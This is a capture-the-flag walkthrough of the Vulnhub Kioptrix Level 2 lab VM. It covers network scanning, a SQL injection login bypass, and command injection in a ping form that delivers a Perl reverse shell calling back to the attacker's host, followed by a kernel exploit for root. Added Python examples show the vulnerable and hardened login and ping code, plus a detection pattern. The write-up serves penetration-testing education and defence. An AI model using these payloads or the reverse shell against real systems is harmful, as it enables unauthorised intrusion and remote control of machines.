Vulnhub – Kioptrix Level 1.1 (#2) Walkthrough

So, I’m here with my second write-up, for the Vulnhub Kioptrix Level 2 challenge. We usually start by enumerating services, but before that we have to find out the IP address of the target machine.

Information Gathering

netdiscover will scan for all devices connected to your network; alternatively you can use arp-scan, your choice.

Arp-scan

arp-scan --interface=eth0 --localnet

Now that we have our target’s IP address, let’s take a look at which services are running on that server.

Nmap

nmap -oA nmap -sC -sV 192.168.1.8

These are the services running on the target machine.

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

Port 80 is running Apache httpd 2.0.52 (CentOS).

Let’s take a look, http://192.168.1.8

There’s a Remote System Administration Login with Username and Password fields. Let’s take a look at the page source; we might find something interesting.

<form method="post" name="frmLogin" id="frmLogin" action="index.php">
	<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
		<tr>
			<td colspan='2' align='center'>
			<b>Remote System Administration Login</b>
			</td>
		</tr>
		<tr>
			<td width="150">Username</td>
			<td><input name="uname" type="text"></td>
		</tr>
		<tr>
			<td width="150">Password</td>
			<td>
			<input name="psw" type="password">
			</td>
		</tr>
		<tr>
			<td colspan="2" align="center">
			<input type="submit" name="btnLogin" value="Login">
			</td>
		</tr>
	</table>
</form>

<!-- Start of HTML when logged in as Administator -->

Nothing special, but since the username and password fields do not appear to have any input validation, we can try SQLi.

BurpSuite

Below is the request we sent; check the response we got.

Request:

POST /index.php HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

uname=1' or '1' = '11&psw=1' or '1' = '1&btnLogin=Login

Response:

<!-- Start of HTML when logged in as Administator -->
	<form name="ping" action="pingit.php" method="post" target="_blank">
		<table width='600' border='1'>
		<tr valign='middle'>
			<td colspan='2' align='center'>
			<b>Welcome to the Basic Administrative Web Console<br></b>
			</td>
		</tr>
		<tr valign='middle'>
			<td align='center'>
				Ping a Machine on the Network:
			</td>
				<td align='center'>
				<input type="text" name="ip" size="30">
				<input type="submit" value="submit" name="submit">
			</td>
			</td>
		</tr>
	</table>
	</form>

So it was simply SQL injection (1' or '1' = '1).

We have tested SQL injection manually. Let’s test SQLmap now.

SQLmap

It generated the payload for us!

Payload: uname=-2356' OR 1260=1260-- DpYb&psw=admin&btnLogin=Login
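To make the bypass concrete from the defender's side, here is an added example (not code from the walkthrough or from the Kioptrix image, whose index.php is PHP and is not shown on the page). It replays both payloads quoted above, the manual Burp one and the sqlmap one, against a constructed in-memory SQLite users table: once through a string-built query of the kind the login must be using, and once through a parameterised query, which is the fix. The table, the credentials and the function names are all assumptions made for the example.

```python
import hmac
import sqlite3

# Payloads quoted from the walkthrough above (Burp request and sqlmap output).
MANUAL_PAYLOAD = ("1' or '1' = '11", "1' or '1' = '1")
SQLMAP_PAYLOAD = ("-2356' OR 1260=1260-- DpYb", "admin")


def make_db():
    """Constructed in-memory users table standing in for the console's database.

    The single plaintext-password row is a stand-in; a real application would
    store a salted password hash and verify against that instead.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("admin", "s3cret"))
    return conn


def login_vulnerable(conn, uname, psw):
    """String-built query: quotes and comment markers in the form fields become SQL syntax.

    With MANUAL_PAYLOAD the WHERE clause ends in "... or '1' = '1'", which is
    always true; with SQLMAP_PAYLOAD the "--" comments out the password check.
    """
    sql = f"SELECT id FROM users WHERE username='{uname}' AND password='{psw}'"
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, uname, psw):
    """Parameterised lookup: the driver passes the field values as data, never as SQL."""
    row = conn.execute("SELECT password FROM users WHERE username = ?", (uname,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison; in real code compare a salted hash (e.g. hashlib.scrypt).
    return hmac.compare_digest(row[0].encode(), psw.encode())


def compare(uname, psw):
    """Return (vulnerable_result, hardened_result) for one username/password pair."""
    conn = make_db()
    return login_vulnerable(conn, uname, psw), login_hardened(conn, uname, psw)


if __name__ == "__main__":
    cases = [("manual", MANUAL_PAYLOAD), ("sqlmap", SQLMAP_PAYLOAD), ("valid", ("admin", "s3cret"))]
    for label, creds in cases:
        print(label, compare(*creds))
```

The vulnerable function accepts both injected pairs without knowing the password; the parameterised one treats the whole field as a username literal, finds no such user and fails. Note that the manual payload's username part ('1' = '11) is actually false; the login still succeeds because the password field carries its own always-true clause, which is why the page's request works despite the stray "1".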

Reverse Shell

There’s another field that runs a ping command. I tested it for injection as well and found that a simple semicolon (;) can be used to bypass the intended command and chain another one after it.

So this is what I did.

192.168.1.1; perl -e 'use Socket;$i="192.168.1.9";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And I ran "nc -lvp 1337" on my machine to catch the reverse shell.
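The ping form fails for the same structural reason as the login: user input is spliced into a command string that a shell interprets. Here is an added example (not the page's pingit.php, which is PHP and not shown) contrasting that pattern with the fix: validate the field as an IP address literal and run the command as an argv list with no shell. The injected sample input chains a harmless "id" rather than the page's reverse shell, and all function names are assumptions for the example.

```python
import ipaddress
import re
import subprocess
from typing import List

# Constructed sample inputs: a legitimate address and an injected one in the
# style of the walkthrough (a second command chained with ';').
BENIGN_INPUT = "192.168.1.1"
INJECTED_INPUT = "192.168.1.1; id"

# Characters that have meaning to /bin/sh and never belong in an IP field.
SHELL_METACHARS = re.compile(r"[;&|`$<>\n(){}]")


def ping_command_vulnerable(ip_field: str) -> str:
    """The risky pattern: the form field is spliced into a shell command line.

    Returned rather than executed so the example is safe to run; passed to a
    shell, the ';' would end ping and start whatever follows it.
    """
    return f"ping -c 3 {ip_field}"


def ping_argv_hardened(ip_field: str) -> List[str]:
    """Validate the field as an IP address, then build an argv list (no shell).

    ipaddress.ip_address() accepts only a bare IPv4/IPv6 literal, so
    metacharacters are rejected up front; the list form of subprocess means
    there is no shell to interpret them anyway.
    """
    addr = ipaddress.ip_address(ip_field.strip())  # raises ValueError on INJECTED_INPUT
    return ["ping", "-c", "3", str(addr)]


def is_rejected(ip_field: str) -> bool:
    """True when the hardened builder refuses the input."""
    try:
        ping_argv_hardened(ip_field)
    except ValueError:
        return True
    return False


def looks_injected(ip_field: str) -> bool:
    """Cheap detection check for a WAF rule or log review: shell metacharacters in an IP field."""
    return bool(SHELL_METACHARS.search(ip_field))


def safe_ping(ip_field: str, timeout: float = 10.0) -> int:
    """Run the hardened form for real and return ping's exit status."""
    return subprocess.run(ping_argv_hardened(ip_field), capture_output=True, timeout=timeout).returncode


if __name__ == "__main__":
    print("vulnerable builds:", ping_command_vulnerable(INJECTED_INPUT))
    print("hardened builds:  ", ping_argv_hardened(BENIGN_INPUT))
    print("hardened rejects: ", is_rejected(INJECTED_INPUT))
    print("flagged:          ", looks_injected(INJECTED_INPUT))
```

Validation and the argv form are two independent layers: even if the allow-list were loosened (hostnames, say), a list passed to subprocess is never re-parsed by a shell, so a semicolon would reach ping as part of one argument and simply fail to resolve. The looks_injected check is the kind of rule that would flag the page's request body in a proxy or application log.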

Now we’re going after root access.

Root

By running the LinEnum.sh script we couldn’t find anything interesting, but if you take a look at the kernel version, there are some exploits available for it.


[-] Kernel information (continued):
Linux version 2.6.9-55.EL ([email protected]) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8))

After some Google searches I found that this exploit might work, so I gave it a try, and it actually worked.


https://www.exploit-db.com/exploits/9545/
